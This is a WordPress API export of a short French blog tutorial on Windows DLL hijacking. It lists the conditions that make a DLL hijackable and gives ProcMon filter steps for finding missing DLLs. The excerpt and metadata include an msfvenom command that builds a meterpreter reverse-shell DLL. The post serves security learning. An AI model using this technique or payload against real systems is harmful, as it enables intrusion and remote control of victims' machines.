Doit \u00eatre d\u00e9finie par l'application\nSe termine par .DLL\nDoit \u00eatre ex\u00e9cut\u00e9e par l'application\nLa DLL n'existe pas sur le syst\u00e8eme\nPrivil\u00e8ge d'\u00e9criture \u00e0 l'emplacement de la DLL <\/code><\/pre><\/p>\nTrouver des DLLs vuln\u00e9rables avec l’utilitaire ProcMon
\nfilter > Filter. Mettre Process Name, Contains et le nom de l’application dans le filtre.<\/p>\n
Nous pouvons maintenant filtrer de nouveau avec
\nPath, ends with, .dll<\/p>\n
Ce que nous voyons dans la colonne “Result” avec NAME NOT FOUND<\/em> signifie que le logiciel tente de charger une DLL, mais ne la trouve pas.<\/p>\nNous pouvons utiliser aussi un filtre
\nResult, contains, NAME NOT FOUND <\/p>\n","protected":false},"excerpt":{"rendered":"
\u00c9tapes pour r\u00e9ussir l’injection de DLL sous windows Identifier l’application vuln\u00e9rable et son emplacement Identifer le ID du processus Identifier les DLL vuln\u00e9rables qui peuvent \u00eatre hijack\u00e9s Remplacer la DLL d’origine G\u00e9n\u00e9ration d’une DLL pour cr\u00e9ation d’une session meterpreter sudo msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vuln\u00e9rable Doit \u00eatre d\u00e9finie par l'application Se termine par .DLL Doit \u00eatre ex\u00e9cut\u00e9e par l'application La DLL n'existe pas sur le syst\u00e8eme Privil\u00e8ge d'\u00e9criture \u00e0 l'emplacement de la DLL Trouver des DLLs vuln\u00e9rables avec l’utilitaire ProcMon filter > Filter. Mettre Process Name, Contains et le nom <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,17],"tags":[],"yoast_head":"\n
DLL Hijacking - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"DLL Hijacking - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"\u00c9tapes pour r\u00e9ussir l’injection de DLL sous windows Identifier l’application vuln\u00e9rable et son emplacement Identifer le ID du processus Identifier les DLL vuln\u00e9rables qui peuvent \u00eatre hijack\u00e9s Remplacer la DLL d’origine G\u00e9n\u00e9ration d’une DLL pour cr\u00e9ation d’une session meterpreter sudo msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vuln\u00e9rable Doit \u00eatre d\u00e9finie par l'application Se termine par .DLL Doit \u00eatre ex\u00e9cut\u00e9e par l'application La DLL n'existe pas sur le syst\u00e8eme Privil\u00e8ge d'\u00e9criture \u00e0 l'emplacement de la DLL Trouver des DLLs vuln\u00e9rables avec l’utilitaire ProcMon filter > Filter. Mettre Process Name, Contains et le nom\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-03T13:18:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-03T16:52:56+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/\",\"name\":\"DLL Hijacking - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-08-03T13:18:42+00:00\",\"dateModified\":\"2021-08-03T16:52:56+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"DLL Hijacking\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"DLL Hijacking - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/","og_locale":"fr_CA","og_type":"article","og_title":"DLL Hijacking - S\u00e9curiser votre site","og_description":"\u00c9tapes pour r\u00e9ussir l’injection de DLL sous windows Identifier l’application vuln\u00e9rable et son emplacement Identifer le ID du processus Identifier les DLL vuln\u00e9rables qui peuvent \u00eatre hijack\u00e9s Remplacer la DLL d’origine G\u00e9n\u00e9ration d’une DLL pour cr\u00e9ation d’une session meterpreter sudo msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=127.0.0.1 LPORT=53 -f dll -o not_malicious.dll Conditions pour qu’une DLL soit vuln\u00e9rable Doit \u00eatre d\u00e9finie par l'application Se termine par .DLL Doit \u00eatre ex\u00e9cut\u00e9e par l'application La DLL n'existe pas sur le syst\u00e8eme Privil\u00e8ge d'\u00e9criture \u00e0 l'emplacement de la DLL Trouver des DLLs vuln\u00e9rables avec l’utilitaire ProcMon filter > Filter. Mettre Process Name, Contains et le nom","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-08-03T13:18:42+00:00","article_modified_time":"2021-08-03T16:52:56+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/","name":"DLL Hijacking - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-08-03T13:18:42+00:00","dateModified":"2021-08-03T16:52:56+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/08\/03\/dll-hijacking\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"DLL Hijacking"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/761"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=761"}],"version-history":[{"count":3,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/761\/revisions"}],"predecessor-version":[{"id":764,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/761\/revisions\/764"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}